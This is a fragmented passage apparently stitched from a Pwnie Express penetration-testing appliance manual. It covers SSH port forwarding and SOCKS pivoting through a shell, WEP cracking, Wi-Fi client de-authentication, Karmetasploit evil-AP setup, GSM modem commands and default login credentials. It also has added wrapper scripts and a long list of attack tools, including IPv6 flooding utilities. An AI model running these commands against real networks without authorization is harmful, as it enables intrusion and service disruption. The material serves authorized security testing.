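    echo "$1:$2:$3"
}

# Write a proxychains config pointing at the SOCKS port opened by -D.
# proxy_dns resolves names on the far side; without it hostnames go to
# your local resolver and usually fail for target-only names.
write_proxychains_conf() {
    cat > "$1" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $2
EOF
}

# Example 1 as a function: forward local 3389 to the RDP target, then rdesktop.
rdp_via_shell() {
    spec=$(local_forward_spec 3389 "$1" 3389) || { echo "bad target $1" >&2; return 1; }
    ssh -f -N -o ExitOnForwardFailure=yes -L "$spec" -p "$SHELL_PORT" pwnie@localhost \
        || return 1
    rdesktop localhost
}

# Example 2 generalised: open the SOCKS listener and run a connect scan of
# the target through it (only -sT works through SOCKS; ICMP does not, hence -Pn).
socks_via_shell() {
    ssh -f -N -o ExitOnForwardFailure=yes -D 8080 -p "$SHELL_PORT" pwnie@localhost \
        || return 1
    write_proxychains_conf ./proxychains.conf 8080
    proxychains nmap -sT -Pn -p 22,80,443,3389 "$1"
}

case "${1:-}" in
    rdp)   rdp_via_shell "$2" ;;
    socks) socks_via_shell "$2" ;;
esac
```

Usage is `sh forwarders.sh rdp 172.16.1.20` or `sh forwarders.sh socks 172.16.1.20`. ExitOnForwardFailure is the important flag: without it ssh logs in and sits there even when the local port is already taken, and rdesktop then connects to nothing. SYN scans, ping sweeps and anything UDP do not traverse a SOCKS proxy; for those use the SSH VPN described in the next section.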
...ter
Accessing additional Bluetooth tools
4G/GSM cellular
Using the unlocked GSM adapter
Activating the Virgin Mobile / Verizon adapters
Connecting to the Internet via 3G
Using the SSH over 3G shell
Zigbee
Using the Goodfet utilities
Network penetration testing with the PX-EPA
Footprinting, Discovery & Scanning
Pentesting tools on the PX-EPA
Configuring and Running Metasploit
Running The Social Engineering Toolkit (SET)
Running FastTrack
Running the tools in /pentest
Running tools installed via aptitude
Additional features
Installing Tenable Nessus Server
Deploying virtual machines
Creating a Backtrack 5 VM
Setting up an encrypted partition
Using Stealth Mode
Adding unsupported software from the Ubuntu repositories
Reviewing the OS environment
Additional Pentesting Resources
How to get support

Introduction

Legal stuff

All Pwnie Express / Rapid Focus Security products are for legally authorized uses only. By using this product you agree to the terms of the Rapid Focus Security EULA: http://pwnieexpress.com/pdfs/RFSEULA.pdf

As with any software application, any downloads/transfers of this software are subject to export controls under the U.S. Commerce Department's Export Administration Regulations (EAR). By using this software you certify your complete understanding of and compliance with these regulations. This product contains
...th SSID "example" is within range of the appliance:

    ifconfig wlan0 up
    iwconfig wlan0 channel 6
    ifconfig wlan0 down
    aireplay-ng -e example --test wlan0

2. Look for the following output:

    17:19:45  Waiting for beacon frame (ESSID: example) on channel 6
    Found BSSID "00:13:10:9E:52:3D" to given ESSID "example".
    17:19:45  Trying broadcast probe requests...
    17:19:45  Injection is working!
    17:19:46  Found 1 AP

3. To auto-crack all WEP-enabled access points on channel 6 using wepbuster:

    ifconfig wlan0 down
    wepbuster 6

Tip: WEP cracking performance is very dependent on the amount of wireless client traffic being generated on the target wifi network. The more traffic on the wireless network, the faster the cracking process.

Wireless client de-authentication

1. This example assumes the target access point is on channel 6:

    iwconfig wlan0 channel 6

2. In one terminal, start airodump-ng:

    airodump-ng --bssid <MAC of target AP> -c 6 wlan0

3. Then in a second terminal, start the client de-authentication:

    aireplay-ng -0 0 -a <MAC of target AP> -c <MAC of target client> wlan0

Karmetasploit

Once an Evil AP is running, Karmetasploit can be invoked as follows:

1. CD to the Metasploit directory:

    cd /opt/metasploit/msf3

2. Confirm the following variables in karma.rc:

    setg AUTOPWN_HOST 192.168.7.1
    set LHOST 192.168.7.1
    use auxiliary/server/capture/http
    set SRVPORT 9443
    set SSL true
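The de-authentication steps above take two MAC addresses as placeholders and use `-0 0`, which sends deauth frames until interrupted. The script below is an added example, not part of the Pwnie Express manual: it wraps those steps with MAC and channel validation, applies the manual's up/channel/down reset before launching the tool, and defaults to a bounded frame count so the disruption stays within what the engagement authorised. The interface name, the default count and the command-line interface are assumptions; the airodump-ng/aireplay-ng invocations are the manual's.

```shell
#!/bin/sh
# Added example, not from the Pwnie Express manual: the client
# de-authentication steps above wrapped with input validation and a
# bounded frame count. The interface name and the default count are
# assumptions; the aireplay-ng invocation is the manual's.
IFACE=${IFACE:-wlan0}

# Return 0 if $1 looks like a MAC address (six hex pairs, colon separated).
is_mac() {
    printf '%s' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# Return 0 if $1 is a 2.4 GHz channel number 1-14.
is_channel() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# The manual's reset sequence: bring the adapter up to set the channel,
# then down again so the aircrack tools start from a known state.
reset_iface() {
    ifconfig "$IFACE" up
    iwconfig "$IFACE" channel "$1"
    ifconfig "$IFACE" down
}

# Send COUNT deauth bursts (default 5) to CLIENT on behalf of AP.
# -0 0 as in the manual means unlimited; a finite count keeps the
# disruption scoped and still provokes the reconnect airodump-ng is
# waiting for in the other terminal.
deauth() {
    ap=$1; client=$2; chan=$3; count=${4:-5}
    is_mac "$ap" && is_mac "$client" || { echo "bad MAC address" >&2; return 1; }
    is_channel "$chan" || { echo "bad channel $chan" >&2; return 1; }
    reset_iface "$chan"
    aireplay-ng -0 "$count" -a "$ap" -c "$client" "$IFACE"
}

case "${1:-}" in
    deauth) shift; deauth "$@" ;;
esac
```

Usage: `sh deauth.sh deauth 00:13:10:9E:52:3D <client MAC> 6 10` while airodump-ng runs in the other terminal as in step 2. Pass a larger count, or 0, only when the engagement explicitly covers a sustained denial of service against the client.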
...included micro-SIM card adapter. Slide the plastic cover back onto the adapter.

Connect the GSM adapter to the appliance's USB port.

Confirm the GSM adapter is detected properly (note: adapter detection may take 15-20 seconds):

    lsusb
    Bus 001 Device 003: ID 12d1:1436 Huawei Technologies Co., Ltd.

To query the GSM modem for adapter details:

    gsmctl -d /dev/ttyUSB0 me

Note: If the command returns "SIM failure", the SIM card is either missing or not inserted properly.

Tip: If the modem does not respond on /dev/ttyUSB0 after 10 seconds, try /dev/ttyUSB1, /dev/ttyUSB2 or /dev/ttyUSB3.

To list cellular operators in range:

    gsmctl -d /dev/ttyUSB0 op

To show the currently attached operator:

    gsmctl -d /dev/ttyUSB0 currop

To show the signal strength of the current operator connection:

    gsmctl -d /dev/ttyUSB0 sig

To check PIN status (READY = no PIN set):

    gsmctl -d /dev/ttyUSB0 pin

To send a text message:

    gsmsendsms -d /dev/ttyUSB0 <destination 11-digit cell number> "Test"

To make an outbound phone call:

    gsmctl -d /dev/ttyUSB0 -o dial <11-digit phone number>

Activating the Virgin Mobile / Verizon adapters

1. The Virgin Mobile and Verizon CDMA adapters must be activated with a mobile broadband plan before they can connect to the Internet. This one-time activation must be completed on Windows.

   Virgin Mobile mobile broadband plans: http://www.virginmobileusa.com/mobile-broadband
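The tip above says to try /dev/ttyUSB1 through /dev/ttyUSB3 by hand if the modem does not answer on /dev/ttyUSB0. The script below is an added example, not part of the Pwnie Express manual: it walks those candidates with a timeout, picks the first device that answers, and runs the manual's gsmctl queries against it. The gsmctl operations are the ones the manual lists; the candidate list, the 10 second timeout and the report format are assumptions.

```shell
#!/bin/sh
# Added example, not from the Pwnie Express manual: find the serial device
# the GSM modem answers on (the tip above says to try ttyUSB0-3) before
# running the gsmctl queries, and run them in one go. The gsmctl operations
# are the manual's; the candidate list, timeout and output format are
# assumptions.

# Print the first argument that exists as a character device, else fail.
first_present() {
    for dev in "$@"; do
        if [ -c "$dev" ]; then
            echo "$dev"
            return 0
        fi
    done
    return 1
}

# Return 0 if gsmctl gets an answer from $1 within $2 seconds. A port that
# exists but belongs to a non-modem endpoint hangs gsmctl, so the timeout
# matters.
modem_answers() {
    timeout "$2" gsmctl -d "$1" me >/dev/null 2>&1
}

# Walk the candidates the manual names; print the first that answers.
find_modem() {
    for dev in /dev/ttyUSB0 /dev/ttyUSB1 /dev/ttyUSB2 /dev/ttyUSB3; do
        [ -c "$dev" ] || continue
        if modem_answers "$dev" 10; then
            echo "$dev"
            return 0
        fi
    done
    echo "no modem answered; check lsusb output and the SIM" >&2
    return 1
}

# Run the manual's queries against whichever device answered.
modem_report() {
    dev=$(find_modem) || return 1
    for op in me op currop sig pin; do
        echo "== $op ($dev)"
        gsmctl -d "$dev" "$op"
    done
}

case "${1:-}" in report) modem_report ;; esac
```

Run `sh gsm_probe.sh report` after lsusb shows the adapter. A "SIM failure" in the `me` output is still the first thing to rule out before blaming the device node.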
...your Linux/Mac/Windows system with the following IP settings:

    IP address: 192.168.9.11
    Netmask: 255.255.255.0

Tip: On Linux hosts you can configure a virtual interface as shown:

    ifconfig eth0:1 192.168.9.11/24

Confirm connectivity to the appliance by pinging it:

    ping 192.168.9.10

You can now access the appliance through the Pwnix UI; proceed to "Accessing the Pwnix UI" below.

Tip: You can also now connect to the appliance via SSH as shown below:

    ssh pwnie@192.168.9.10

Using the Pwnix UI

Accessing the Pwnix UI

1. Open a web browser and access the UI: https://appliance_ip_address:8443

   Tip: If accessing for the first time, the default URL is https://192.168.9.10:8443

2. The UI is SSL-enabled, but you will receive a warning as the certificate is self-signed.

3. You are then prompted for a login/password (default is pwnie / pwnplug8000).

4. The Setup page appears.

Important: Please change the default Pwnix password as soon as possible. Proceed to "Change Pwnix Password" below.

Setup tab

Change Pwnix Password

1. Click Setup on the top menu.
2. Click User Interface.
3. Enter a new password for the pwnie user into both fields and click Update password.

Note: This will change the password for the pwnie UI user and the pwnie system (Linux/SSH) account. Pwnix UI authentication is integrated with Linux PAM, allowing the UI and system passwords to be synced for the
    ...weevely && python weevely.py
    python /pentest/wifitap/wifitap.py -h
    python /pentest/wifite/wifite.py
    python /pentest/wifizoo/wifizoo.py

Running tools installed via aptitude

    arp-scan
    ettercap -h
    dsniff -h
    hping3 -h
    john
    nbtscan
    nc -h
    ftp -h
    telnet -h
    nikto -Help
    openssl
    scapy -h
    xprobe2 -h
    iodine
    openvpn
    cryptcat -h
    sipsak
    miredo -h
    sslsniff
    tcptraceroute
    netdiscover
    udptunnel -h
    dnstracer
    sslscan
    ipcalc
    socat -h
    onesixtyone
    tinyproxy -h
    dmitry
    ssldump -h
    fping -h
    gpsd -h
    darkstat
    arping
    sipcrack
    proxychains
    proxytunnel --help
    wapiti
    skipfish -h
    nmap
    hydra
    alive6
    amap6
    denial6
    detect-new-ip6
    dnsdict6
    dos-new-ip6
    exploit6
    fake_advertise6
    fake_dhcps6
    fake_dnsupdate6
    fake_mipv6
    fake_mld26
    fake_mld6
    fake_mldrouter6
    fake_router6
    flood_advertise6
    flood_dhcpc6
    flood_mld26
    flood_mld6
    flood_mldrouter6
    flood_router6
    flood_solicitate6
    fragmentation6
    fuzz_ip6
    implementation6
    kill_router6
    ndpexhaust6
    parasite6
    randicmp6
    redir6
    rsmurf6
    sendpees6
    sendpeesmp6
    smurf6
    thcping6
    toobig6
    trace6

Additional features

Installing Tenable Nessus Server

1. Download the Ubuntu 12.04 64-bit Nessus .deb
